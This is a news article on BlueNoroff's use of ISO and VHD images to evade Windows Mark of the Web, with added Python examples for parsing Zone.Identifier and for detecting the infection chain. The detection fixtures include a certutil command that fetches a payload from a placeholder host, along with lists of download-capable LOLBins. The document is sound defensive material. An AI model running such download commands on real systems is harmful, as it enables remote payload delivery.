BlueNoroff APT hackers use new ways to bypass Windows MotW protection

December 27, 2022 | Ravie Lakshmanan | Cyberattack / Windows Security

BlueNoroff, a sub-cluster of the notorious Lazarus Group, has been observed adopting new techniques in its playbook that allow it to circumvent Windows Mark of the Web (MotW) protections.

This includes the use of optical disc (.ISO extension) and virtual hard disk (.VHD extension) image file formats as part of a new infection chain, Kaspersky revealed in a report published today.

“BlueNoroff created many fake domains posing as venture capitalists and banks,” security researcher Seongsu Park said, adding that the new attack procedure was first observed in the company's telemetry in September 2022.

Some of the bogus domains were found to imitate ABF Capital, Angel Bridge, ANOBAKA, Bank of America and Mitsubishi UFJ Financial Group, most of which are based in Japan, signaling a “strong interest” in the region.

Also referred to by the names APT38, Nickel Gladstone, and Stardust Chollima, BlueNoroff is part of the larger Lazarus threat group which also includes Andariel (aka Nickel Hyatt or Silent Chollima) and Labyrinth Chollima (aka Nickel Academy).

The threat actor’s financial motivation, as opposed to espionage, makes it an unusual nation-state actor in the threat landscape, allowing for a “wider geographic spread” and enabling it to infiltrate organizations across North and South America, Europe, Africa and Asia.


The group has since been linked to high-profile cyberattacks targeting the SWIFT banking network between 2015 and 2016, including the audacious Bangladesh Bank heist of February 2016 that led to the theft of $81 million.


Since at least 2018, BlueNoroff appears to have undergone a tactical shift, moving away from attacks on banks to focus solely on cryptocurrency entities as a source of illicit revenue.

To that end, Kaspersky earlier this year disclosed details of a campaign dubbed SnatchCrypto, orchestrated by the adversarial collective to drain digital funds from victims’ cryptocurrency wallets.

Another key activity attributed to the group is AppleJeus, in which fake cryptocurrency companies are created to trick unwitting victims into installing benign-looking apps that later receive backdoored updates.

The latest activity identified by the Russian cybersecurity firm introduces slight modifications to the way the final payload is delivered, swapping the Microsoft Word document attachments used in earlier spear-phishing emails for ISO files. Disk images are attractive because the MotW zone identifier travels with the downloaded image file itself but, on the Windows builds targeted here, was not propagated to the files inside the image once it was mounted, so SmartScreen and Office Protected View did not treat those files as internet-sourced.
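The mark SmartScreen and Office consult lives in an NTFS alternate data stream named Zone.Identifier on the downloaded file. The following Python helper, added here as an illustration and not taken from the Kaspersky report or from any BlueNoroff tooling, parses that stream, reads it from a path where the volume supports it, and walks through the container-versus-content situation the article describes: the sample stream text, the hypothetical `decoy.iso` name and the URLs are constructed for the example.

```python
"""Inspect the Mark-of-the-Web (Zone.Identifier) stream and show why image
contents escape it. Added example; not code from the article or the actor."""
import os
from typing import Optional

# URLZONE values as Windows writes them into the stream.
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}
# Zones for which SmartScreen / Protected View treat the file as untrusted.
UNTRUSTED_ZONES = {3, 4}

# Constructed sample stream, formatted the way Windows writes it
# (CRLF line endings, INI-style [ZoneTransfer] section). The URLs are placeholders.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/\r\n"
    "HostUrl=https://example.invalid/decoy.iso\r\n"
)


def parse_zone_identifier(stream: str) -> dict:
    """Parse the INI-style stream into a dict; ZoneId is converted to an int."""
    info, section = {}, None
    for raw in stream.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, _, value = line.partition("=")
            info[key.strip()] = value.strip()
    if "ZoneId" in info:
        info["ZoneId"] = int(info["ZoneId"])
    return info


def read_zone_identifier(path: str) -> Optional[str]:
    """Return the raw Zone.Identifier stream of `path`, or None if there is none.

    NTFS exposes the stream as `<path>:Zone.Identifier`. A file that was never
    downloaded, or that sits on a volume without the stream (such as the contents
    of a mounted ISO/VHD, where only the container file carries the mark), has none.
    """
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8",
                  errors="replace") as fh:
            return fh.read()
    except OSError:  # stream absent, non-NTFS volume, or a non-Windows host
        return None


def is_untrusted(stream: Optional[str]) -> bool:
    """True when the stream marks the file as coming from an untrusted zone."""
    if stream is None:
        return False
    return parse_zone_identifier(stream).get("ZoneId") in UNTRUSTED_ZONES


def simulate_image_delivery() -> dict:
    """Model the chain from the article: the downloaded image is marked,
    the PPSX/VBScript extracted from the mounted image are not."""
    container_stream = SAMPLE_STREAM   # what the ISO/VHD file carries
    content_stream = None              # what a file inside the mounted image carries
    return {
        "container_untrusted": is_untrusted(container_stream),
        "content_untrusted": is_untrusted(content_stream),
    }


if __name__ == "__main__":
    info = parse_zone_identifier(SAMPLE_STREAM)
    print("container zone:", ZONE_NAMES[info["ZoneId"]], info.get("HostUrl"))
    print("simulation:", simulate_image_delivery())
    # On Windows, try it on a real download (path is a placeholder):
    print("local check:", read_zone_identifier(os.path.expanduser("~/Downloads/file.iso")))
```

Because `is_untrusted` returns False for a missing stream, every file extracted from the mounted image is evaluated exactly as if it had been created locally, which is the whole value of the ISO/VHD wrapper to the attacker.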

These ISO images, in turn, contain a Microsoft PowerPoint slideshow (.PPSX) and a Visual Basic script (VBScript) that is executed when the target clicks a link in the PowerPoint file.

In another method, a Windows batch file is launched via a living-off-the-land binary (LOLBin) to retrieve a second-stage downloader, which in turn fetches and executes a payload from a remote server.
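Both chains leave the same kind of trace in process-creation telemetry: an Office application spawning a script host, a script or batch file running from a volume that is not the system drive, and a download-capable LOLBin being handed a URL. The detection logic below is an added example of what a SOC engineer might write against Sysmon Event ID 1 style records; it is not from the Kaspersky report, and the five events, file names (`decoy.ppsx`, `decoy.vbs`, `run.bat`) and the `https://example.invalid/` URL are constructed for the example. The `E:` drive stands in for a mounted image, which is only a weak signal on its own, so it is reported separately rather than folded into the stronger rules.

```python
"""Flag the process-creation patterns of an ISO/VHD-delivered chain.
Added example over constructed Sysmon-style events; not the article's code."""
import re
from typing import Dict, List, Tuple

OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
# LOLBins commonly used to pull a second stage; cmd.exe is deliberately excluded.
DOWNLOAD_LOLBINS = {"certutil.exe", "bitsadmin.exe", "curl.exe", "mshta.exe", "powershell.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# A drive-letter path to a script/batch file on the command line; group 1 is the drive.
SCRIPT_PATH_RE = re.compile(
    r'([A-Za-z]):\\[^"\s]+\.(?:vbs|vbe|js|jse|bat|cmd|hta|ps1)\b', re.IGNORECASE)

# Constructed sample events (field names follow Sysmon Event ID 1). E:\ plays the
# role of a mounted disk image; the file names are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"POWERPNT.EXE" /s "E:\decoy.ppsx"'},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "CommandLine": r'wscript.exe "E:\decoy.vbs"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /c "E:\run.bat"'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f https://example.invalid/u.dat C:\Users\Public\u.dat"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rules_for(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    hits: List[str] = []

    # Rule 1: the PPSX link click -- an Office process spawns a script host.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")

    # Rule 2: a download-capable LOLBin given a URL (second-stage retrieval).
    if image in DOWNLOAD_LOLBINS and URL_RE.search(cmdline):
        hits.append("lolbin_download")

    # Rule 3 (weak): script or batch file executed from a non-system volume,
    # which is what a mounted ISO/VHD looks like. Tune the drive list per estate.
    m = SCRIPT_PATH_RE.search(cmdline)
    if m and m.group(1).upper() != "C":
        hits.append("script_on_nonsystem_volume")

    return hits


def detect(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every match across the event list."""
    return [(i, rule) for i, ev in enumerate(events) for rule in rules_for(ev)]


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Run against the sample set, the wscript.exe event matches both the Office-parent rule and the non-system-volume rule, the batch file matches only the weak volume rule, and the certutil.exe event matches the download rule; the benign `cmd.exe /c dir` and the PowerPoint launch itself produce no alerts. In production the volume rule should be correlated with a preceding image-mount event rather than used alone.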


Kaspersky also discovered a sample .VHD file bundled with a decoy job description PDF that is designed to spawn an intermediate downloader masquerading as antivirus software to fetch the next-stage payload, but not before disabling genuine EDR solutions by removing their user-mode hooks.

Although the exact backdoor delivered is unclear, it is believed to be similar to a persistent backdoor used in SnatchCrypto attacks.

The use of Japanese filenames for one of the decoy documents along with the creation of fraudulent domains disguised as legitimate Japanese venture capital firms suggests that the island nation’s financial firms are likely targets of BlueNoroff.

Cyber warfare has been a major focus of North Korea in response to economic sanctions imposed by a number of countries and the United Nations over concerns about its nuclear programs. It has also become a major source of income for the cash-strapped country.

Indeed, according to South Korea’s National Intelligence Service (NIS), state-sponsored North Korean hackers are estimated to have stolen $1.2 billion worth of cryptocurrency and other digital assets from targets around the world over the past five years.

“This group has a strong financial motivation and is actually successful in profiting from its cyberattacks,” Park said. “It also suggests that attacks by this group are unlikely to decrease in the near future.”
